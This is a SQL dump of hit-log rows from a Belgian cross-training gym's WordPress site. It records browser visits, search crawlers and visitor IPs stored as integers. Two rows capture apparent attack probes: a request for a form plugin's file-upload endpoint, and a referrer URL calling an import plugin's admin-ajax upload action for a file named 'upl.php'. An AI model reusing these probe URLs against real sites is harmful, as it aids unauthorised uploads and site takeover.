(69569, 1492375500.366656, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69570, 1492375501.005787, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69571, 1492375501.569809, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69572, 1492375502.249867, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69573, 1492375503.054902, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69574, 1492375503.599243, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69575, 1492375504.091981, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69576, 1492375504.607685, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69577, 1492388722.063542, 3427775662, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)'),
(69578, 1492393314.536305, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/fluid_forms/file-upload/server/php/', 'http://crosstrainingcenter.be/wp-content/plugins/fluid_forms/file-upload/server/php/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(69579, 1492394360.163137, 3024883606, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69580, 1492399846.423687, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69581, 1492399846.854857, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69582, 1492408673.310779, 3475901939, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69583, 1492409437.670829, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69584, 1492409438.226644, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69585, 1492409438.710070, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69586, 1492409439.112693, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69587, 1492409439.592546, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69588, 1492409440.090676, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69589, 1492409440.582122, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69590, 1492409441.036589, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69591, 1492409441.455086, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69592, 1492409441.933703, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69593, 1492409442.394681, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69594, 1492411212.507800, 3024883463, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69595, 1492418364.991878, 3641698807, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/87.0.0.44.70;FBBV/54482584;FBDV/iPhone8,4;FBMD/iPhone;FBSN/iOS;FBSV/10.3.1;FBSS/2;FBCR/Telenet;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/55128799]'),
(69596, 1492418910.077189, 1170580419, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69597, 1492418912.050223, 1170580419, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69598, 1492418914.461336, 1170580419, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(69599, 1492419006.845556, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69600, 1492419007.259594, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69601, 1492419025.720353, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69602, 1492419052.685158, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69603, 1492419077.683332, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69604, 1492419107.715149, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69605, 1492419144.179397, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69606, 1492419157.719352, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69607, 1492419178.731539, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69608, 1492419202.806650, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69609, 1492419234.118755, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69610, 1492419256.759817, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69611, 1492419323.318607, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69612, 1492419333.703065, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69613, 1492419343.137223, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(69614, 1492419574.237680, 2760155452, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69615, 1492419591.799920, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69616, 1492420386.863861, 1442374563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crossroadschurchkc.org/membership//wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=upl.php', 'Mozilla/5.0 (Macintosh  U  Intel Mac OS X 10_5_8  ru-ru) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19'),
(69617, 1492422708.785379, 2366158866, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69618, 1492422712.351758, 2366145539, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69619, 1492423612.150939, 1439300774, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.facebook.com/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69620, 1492423613.707164, 1439300774, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69621, 1492425750.256505, 1538458968, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATNOZu96I3RgIxRTvG2UbM9A2879JIa7pZYtoPspT98BDH8RbZwG7O-HLAbdAQuBwmDcC8tI6xwcfPEASUNeY51UYoULFfHqhXadbxaIcSJuCA', 'Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/87.0.0.44.70;FBBV/54482584;FBDV/iPad4,1;FBMD/iPad;FBSN/iOS;FBSV/10.3.1;FBSS/2;FBCR/;FBID/tablet;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(69622, 1492425750.414563, 2918995145, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(69623, 1492429339.047594, 1837489426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69624, 1492429357.578314, 1837489426, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69625, 1492434343.168940, 1357699967, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69626, 1492434346.701000, 1357699967, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69627, 1492434725.983579, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69628, 1492434726.467556, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69629, 1492435067.077055, 1374767888, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69630, 1492435068.586896, 1374767888, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69631, 1492435342.432069, 1374767888, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69632, 1492435344.502383, 1374767888, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69633, 1492436790.249306, 1538306626, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69634, 1492436790.926138, 1538306626, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69635, 1492436791.399462, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69636, 1492436791.831890, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69637, 1492436792.407187, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69638, 1492436793.089317, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69639, 1492436793.668150, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69640, 1492436794.237537, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69641, 1492436794.792597, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69642, 1492436795.875123, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69643, 1492436796.659254, 1538306626, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/808.3 Darwin/16.3.0'),
(69644, 1492437072.791009, 1837489426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69645, 1492437107.089681, 1837489426, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(69646, 1492440273.173612, 1439300774, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.facebook.com/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69647, 1492440281.122200, 1439300774, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69648, 1492440282.965627, 1439300774, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69649, 1492440289.477707, 1439300774, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69650, 1492440795.585036, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69651, 1492442016.196380, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69652, 1492442854.683817, 676177666, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69653, 1492449922.473730, 2637637489, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69654, 1492452698.590166, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69655, 1492452699.804948, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69656, 1492452992.268656, 2637637489, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69657, 1492452992.434255, 2637637489, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69658, 1492453054.253090, 2637637578, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69659, 1492454526.838284, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69660, 1492455010.602324, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69661, 1492455014.585049, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69662, 1492456403.507513, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69663, 1492456404.842940, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69664, 1492456405.368582, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69665, 1492456405.881942, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69666, 1492456407.664009, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69667, 1492456408.320855, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69668, 1492456409.010555, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69669, 1492456409.841130, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69670, 1492456410.293191, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69671, 1492456410.841258, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69672, 1492456411.479153, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(69673, 1492460335.262948, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69674, 1492460398.205067, 1374687984, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.bing.com/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69675, 1492460399.391479, 1374687984, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69676, 1492460426.311162, 1374687984, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69677, 1492460427.732766, 1374687984, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/prix/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69678, 1492460521.437484, 1374687984, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69679, 1492460522.745464, 1374687984, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(69680, 1492469396.067441, 2509959393, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69681, 1492469456.902330, 2509959393, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/les-seances-limelette/', 'Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69682, 1492469486.596636, 2509959393, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(69683, 1492471199.029322, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69684, 1492471200.556553, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69685, 1492471202.159082, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69686, 1492471203.908967, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69687, 1492471205.538213, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69688, 1492471207.424142, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69689, 1492471209.633224, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69690, 1492471212.456376, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69691, 1492471216.851788, 1161474619, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(69692, 1492472525.276128, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69693, 1492483200.974521, 2731721826, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(69694, 1492483218.611488, 2731721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(69695, 1492483226.563067, 2731721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(69696, 1492483232.005293, 2731721826, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
